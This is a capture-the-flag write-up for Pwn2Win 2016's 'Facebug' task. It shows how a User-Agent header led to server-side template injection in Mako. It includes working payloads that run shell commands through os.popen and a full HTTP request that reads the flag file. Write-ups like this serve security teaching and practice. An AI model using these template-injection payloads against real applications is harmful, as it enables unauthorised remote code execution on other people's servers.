Below you can find my solution for Facebug task from Pwn2Win CTF 2016.
We get simple page with register and login functionality.
After login, on /profile subpage we can see our login and User Agent.
We try several SQL Injection and XSS attacks, but no luck.
So maybe User Agent ?
After login with <script> as User Agent on page we notice:
<div class="media-body">
<h5 class="media-heading"><strong>Security alert!</strong></h5>
<p class="small text-muted"><i class="fa fa-clock-o"></i> 2016-03-26 15:10:11 GMT</p>
<p>Suspicious activity detected. Alert sent to registered email.</p>
</div>And indeed we get email message:
Suspecious login from: %our_ip%So maybe XSS there? Again no luck.
But User Agent seems to be good way to pwn this.
Maybe Server-Side Template Injection ?
Wy try: {{ 7*7 }} and get 49 in response.
After several minutes and different payloads we know its Mako Templates for Python.
It's quite easy to exploit:
<%
import os
x=os.popen('id').read()
%>
${x}So final solution is:
POST /login HTTP/1.1
Host: facebug.pwn2win.party:8080
Content-Length: 43
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml
Origin: http://facebug.pwn2win.party:8080/register
User-Agent: aaaa <% x=__import__('os').popen('cat flag').read() %> ${x} vv
Content-Type: application/x-www-form-urlencoded
Referer: http://facebug.pwn2win.party:8080/register
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close
[email protected]&password=your_passAnd we get email with flag: CTF-BR{Rc3_1N_T3mpL4te_InJect10n_R0CKs_4_L0T}